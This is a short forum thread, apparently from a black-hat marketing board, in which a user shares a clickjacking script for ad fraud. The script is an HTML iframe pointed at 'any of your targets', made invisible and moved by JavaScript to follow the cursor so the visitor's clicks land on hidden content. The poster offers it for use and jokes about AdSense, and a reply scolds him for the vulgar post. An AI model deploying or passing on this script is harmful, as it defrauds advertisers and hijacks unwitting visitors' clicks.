hi everyone

Status
Not open for further replies.

Baki11

Newbie
Joined
Mar 6, 2016
Messages
1
Reaction score
1
i have been around in internet looking for a script to use with ads,clickjacking or something.

in so many places i was asking and nothing,no1 was telling me anything. i even saw some here in blackhat but the most doesnt work. at least not when you upload on web. so i am posting this script here,its working but i dont recomand it with adsense.
just create your own iframe, opacity 0, set the right ids and there wont be any problems. ahahahahahaahahahaahhaaha ok there can be any problem its your own risk.


HTML:
<div style="overflow: hidden; width: 160px; height: 152px; position: relative;" id="icontainer"><iframe id="fas" src="any of your targets" style="border: 0pt none ; left: -1187px; top: -833px; position: absolute; width: 1705px; height: 1360px;opacity:1;" scrolling="no"></iframe></div>

<script> document.onmousemove = function (e) {
        var x = e.pageX;        var y = e.pageY;                document.getElementById ('icontainer') .style.top = y-15 + 'px' ;        document.getElementById ('icontainer') .style.left = x-40 + 'px' ;                                        }                </script>
 
I had to delete the last part of the code, for removing the iframe after one click
 
google can suck my dick hahahahaahhahahahahahahaha
 
google can suck my dick hahahahaahhahahahahahahaha

What?

I just told someone new that they shouldn't make stupid posts when they're starting off.. you've taken the cake.
 
Status
Not open for further replies.
Back
Top